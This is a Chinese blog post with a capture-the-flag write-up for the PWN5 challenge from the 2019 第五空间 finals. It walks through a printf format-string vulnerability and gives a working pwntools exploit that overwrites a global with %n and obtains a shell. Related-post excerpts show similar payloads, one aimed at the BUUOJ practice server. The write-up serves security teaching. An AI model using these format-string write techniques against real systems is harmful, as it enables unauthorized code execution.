[CTF][第五空间2019 决赛]PWN5 1

最新推荐文章于 2024-04-01 09:29:25 发布
最新推荐文章于 2024-04-01 09:29:25 发布
阅读量1k 收藏 2
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/121837662
版权

解题思路

反编译后的源码:

  srand(__seed);
  // 生成随机数
  iVar1 = open("/dev/urandom",0);
  read(iVar1,&DAT_0804c044,4);
  printf("your name:");
  // 读取输入
  read(0,local_78,99);
  printf("Hello,");
  // 打印输入
  printf(local_78);
  printf("your passwd:");
  read(0,local_88,0xf);
  iVar1 = atoi(local_88);
  // 判断输入密码是否与前面的随机数相等。
  if (iVar1 == DAT_0804c044) {
    puts("ok!!");
    system("/bin/sh");
  }
  else {
    puts("fail");
  }

经过分析,找到突破口:printf(local_78); 该处会原样打印输入。可利用格式化输出写入或打印相关值。
知识点:
%xc%y$n
y为需要写入的地址值,x为输出长度,也是需要覆写的值。其中y一般利用栈上的数据。

那需要解决的问题如下:
如何覆写DAT_0804c044的值,使之与后续输入的密码相等。

  1. DAT_0804c044的地址
    DAT_0804c044为全局变量,可以直接使用该变量虚拟地址0x0804c044。

  2. 如何覆写
    gdb调试发现,printf的时候,栈上并没有可利用的值。
    经过一番实验、搜索、再实验(很痛苦漫长的过程)后,找到下述方法:
    利用输入构造需要写入的地址
    难点在于找到可以利用该地址的堆栈位置,寻找方法:输入AAAA%x$p, x为栈上存储输入的相对位置,一般不会太远。当输出伟AAAA0x41414141时,即为所找位置。
    找到该位置后,即可编写脚本:

  1 from pwn import *
  2
  3 sh = process('./2019pwn5')
  4 sh.recvuntil('e:')
  5 sh.sendline(p32(0x0804c044) + b'%1c%10$n') // 10为找到的栈上相对位置
  6 sh.recvuntil('d:')
  7 sh.sendline('5') // 4个字节的地址+1个字节 = 5
  8 sh.interactive()

附录即为寻找到的方法,文章中更进一步的,提到了利用printf执行shellcode的方法,即将shellcode写入
.fini_array段中。当然,本题不需要,但是是可以借鉴的一个点。

附录:

  1. printf Format String Exploitation
delta_hell
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4189
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 362
[buuctf][第五空间2019 决赛]PWN5
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 541
简单易懂~
[第五空间2019 决赛]PWN5
qq_53928256的博客
10-07 225
由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为。由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量。偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;所以我们可以通过格式化字符串漏洞的任意地址修改更改地址。被存储到了第10个栈参数的位置,所以对应的偏移为10。然后将这4个地址对应的存储位置,通过。将对应地址内容修改为输出的字符个数;读出的4个字节的内容即为。
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 457
完全通过静态分析得到题解,与网传算法不同
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1349
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 559
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
[第五空间2019 决赛]PWN5 1
向安全进发的博客
05-19 1390
这样,我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用%10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的了。再看一下程序流程:如果nptr也就是输入的密码和0x804c044下的数字相同,则成功。先写入buf,随后又printf(buf),明显的格式化字符串漏洞。因此我们可以通过%n来修改0x804c044上的数达到自己的目的。A的ascll码为41,因此偏移值为10。32位程序,有canary。首先了解一下什么是%n。
[第五空间2019 决赛]PWN51解题
2301_81504456的博客
03-11 468
主要格式化字符串漏洞利用,后面添加recvline及脚本编写说明仅为个人理解🌹🌹🌹(个人还是小白一枚)希望帮助理解,望大家多多指出错误及正确理解做法。
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 965
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 360
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin堆溢出得shell,
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 394
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值